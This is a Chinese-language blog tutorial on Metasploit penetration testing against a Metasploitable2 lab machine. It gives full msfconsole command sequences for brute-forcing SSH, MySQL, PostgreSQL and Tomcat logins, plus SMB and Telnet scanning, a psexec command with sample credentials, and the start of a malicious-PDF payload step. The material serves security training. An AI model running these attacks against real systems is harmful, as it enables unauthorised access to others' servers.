zoukankan      html  css  js  c++  java
  • Kali MSF漏洞利用

    一、前言

      漏洞利用是获得系统控制权限的重要途经。用户从目标系统中找到容易攻击的漏洞,然后利用该漏洞获取权限,从而实现对目标系统的控制。  

    二、Metasploitable

      Metasploitable是一款基于Ubuntu Linux的操作系统。该系统是一个虚拟机文件,从https://sourceforge.net/projects/metasploitable/files/latest/download 网站获取最新版,下载解压之后可以直接使用,无需安装。Metasploitable就是用来作为攻击用的靶机,所以它存在大量为打补丁漏洞,并且开放了无数高危端口。

    三、Metasploit基础

      Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。

    3.1  Metasplot终端(MSF console)

      MSF终端(msf console)是目前Metasploit框架最为流行的用户接口,而且也是非常灵活的。因为MSF终端是Metasploit框架中最灵活、功能最丰富及支持最好的工具之一。msf console主要用户管理Metasploit数据库,管理绘画、配置并启动Metasploit模块。本质上来说,就是为了利用漏洞,msf console将获取用户连接到主机的信息,以至于用户能启动渗透攻击目标系统。

      当使用Metasploit控制台时,将使用一些通用的命令,如下所示。

    help: 该命令允许用户查看执行命令的帮助信息。
    user module: 该命令允许用户加载选择的模块。
    set optionname module: 该命令为模块设置不同的选项。
    run: 该命令用来启动一个非渗透攻击模块
    search module: 该命令用于搜索一个特定的模块。
    exit: 退出msf console

    (1) 在终端启动msf console,执行命令如下所示:

    root@kali:~/桌面# msfconsole 

     输出的信息出现msf5>提示符,表示登录msf console成功。此时就可以允许其他命令了。

    (2)使用search命令搜索所有有效的模块。

    msf5 > search ssh_login 

    执行以上命令后,输出信息如下所示:

     (3)使用SSH口令爆破模块

    msf5 > use auxiliary/scanner/ssh/ssh_login     # 等同于 use 0    0表示前面的编号 

     (4)查看模块有效选项,执行命令如下所示:

    msf5 auxiliary(scanner/ssh/ssh_login) > show options 

     (5)设置有效参数,执行命令如下所示:

    msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.244.132
    rhosts => 192.168.244.132
    msf5 auxiliary(scanner/ssh/ssh_login) > set username root
    username => root
    msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /root/sshpass.txt
    pass_file => /root/sshpass.txt

     (6)启动模块,执行命令如下所示:

    msf5 auxiliary(scanner/ssh/ssh_login) > run

     (7)查看session,执行命令如下所示:

    msf5 auxiliary(scanner/ssh/ssh_login) > sessions -l

     (3) 连接session,执行命令如下所示:

    msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 1

    如下图所示,已成功连接至目标主机

    3.2 Meterpreter 

      Meterpreter通常作为利用漏洞后的攻击载荷所使用,攻击载荷在出发漏洞后能返回给用户一个控制通道。当使用msfconsole获取到目标系统上的一个Meterpreter连接时,用户必须使用Meterpreter传递攻击载荷。msfconsole用于管理用户的会话,而Meterpreter则是攻击载荷和渗透攻击交互。

      Meterpreter常见的命令如下所示:

    help: 查看帮助信息
    background: 允许用户在后台Meterpreter会话。
    download:允许用户从入侵主机上下载文件。
    upload:允许用户上传文件到入侵主机。
    execute:允许用户在入侵主机上执行命令。
    shell:允许用户在入侵主机上(仅是Windows主机)运行Windows shell命令。
    sessions -i: 允许用户切换会话

     四、渗透攻击应用

    4.1 渗透攻击MySQL数据库

    目标靶机使用的Metasploitable2

    msf5 > search mysql_login
    msf5 > use auxiliary/scanner/mysql/mysql_login
    msf5 auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.244.136
    rhosts => 192.168.244.136
    msf5 auxiliary(scanner/mysql/mysql_login) > set user_file /root/username.txt
    user_file => /root/username.txt
    msf5 auxiliary(scanner/mysql/mysql_login) > set pass_file /root/password.txt
    pass_file => root/password.txt
    msf5 auxiliary(scanner/mysql/mysql_login) > exploit

     输出的信息是渗透攻击的一个过程,尝试使用指定的用户名/密码文件中的用户名和密码连接MySQL服务器。在渗透攻击过程中,Metasploit会尝试输入用户名和密码文件包含的用户名和密码组合。

    4.2 渗透攻击PostgreSQL数据库服务

    目标靶机使用的Metasploitable2

    msf5 > search postgres_login
    msf5 auxiliary(scanner/mysql/mysql_login) > use auxiliary/scanner/postgres/postgres_login
    msf5 auxiliary(scanner/postgres/postgres_login) > set rhosts 192.168.244.136
    rhosts => 192.168.244.136
    msf5 auxiliary(scanner/postgres/postgres_login) > set user_file /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt
    user_file => /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt
    msf5 auxiliary(scanner/postgres/postgres_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt
    pass_file => /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt
    msf5 auxiliary(scanner/postgres/postgres_login) > exploit

     4.3 渗透攻击Tomcat服务

      Tomcat默认存在一个管理后台,默认的管理地址是http://IP:端口/manager/html。通过此后台,可以在不重启Tomcat服务的情况西安方便地部署、启动、停止或卸载Web应用。但是如果配置不当的话就存在很大的安全隐患。攻击者利用这个漏洞,可以非常快速、轻松地入侵一台服务器。

    目标靶机使用的Metasploitable2

    msf5 > search tomcat_mgr_login
    msf5 > use auxiliary/scanner/http/tomcat_mgr_login
    msf5 auxiliary(scanner/http/tomcat_mgr_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
    pass_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
    msf5 auxiliary(scanner/http/tomcat_mgr_login) > set user_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
    user_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
    msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.244.136
    rhosts => 192.168.244.136
    msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
    rport => 8180
    msf5 auxiliary(scanner/http/tomcat_mgr_login) > exploit

     4.4 渗透攻击Telnet服务

    msf5 > search telnet_version
    msf5 auxiliary(scanner/http/tomcat_mgr_login) > use auxiliary/scanner/telnet/telnet_version
    msf5 auxiliary(scanner/telnet/telnet_version) > set rhosts 192.168.244.136
    rhosts => 192.168.244.136
    msf5 auxiliary(scanner/telnet/telnet_version) > exploit

     4.5 渗透攻击Samba服务

      Samba是实现SMB(Server Messages Block)协议、跨平台进行文件共享和打印共享服务的程序。Samba服务对应的端口有139和445等,只要开启这些端口后,主机就可能存在Samba服务远程溢出漏洞。

          目标靶机使用的Metasploitable2

    msf5 > search smb_version
    msf5 > use auxiliary/scanner/smb/smb_version
    msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.244.136
    rhosts => 192.168.244.136
    msf5 auxiliary(scanner/smb/smb_version) > exploit

       假如通过SMB爆破出目标主机的用户及密码、目标主机又没有开启RDP时,可以使用psexec.exe \目标主机地址 -l administrator -p 1234567 cmd.exe

    4.6 PDF文件攻击

      PDF是一种文件格式,该文件的使用比较广泛,并且容易传输。通常工作中,用户都是从工作程序中打开了一个合法的PDF文档。当打开该文档时,该用户的主机就可能被攻击。Metasploit提供了一个渗透攻击模块,可以创建一个攻击载荷,通过传递该攻击载荷对目标系统进行渗透攻击。

    msf5 auxiliary(scanner/smb/smb_version) > search adobe_pdf_embedded_exe
  • 相关阅读:
    VR全景项目外包团队— VR/AR相关领域介绍和VR全景案例
    虚拟现实外包公司— VR开发编辑器意义重大 印证VR不仅服务于用户
    全景VR视频游戏外包公司:技术分享使用U3D+CB制作VR游戏
    承接Unity3D外包公司 — 技术分享
    承接cardboard外包,unity3d外包(北京动软— 谷歌CARDBOARD真强大)
    VR外包团队:长年承接VR虚拟现实外包(应用、游戏、视频、漫游等)
    北京全景视频外包公司:长年承接VR全景视频外包
    北京VR视频外包团队:全景VR视频科普
    全景VR视频外包公司:长年承接VR全景视频外包(技术分享YouTube的360全景视频)
    Unity3D外包团队——技术分享U3D全景漫游(三)
  • 原文地址:https://www.cnblogs.com/hwlong/p/9076764.html
Copyright © 2011-2022 走看看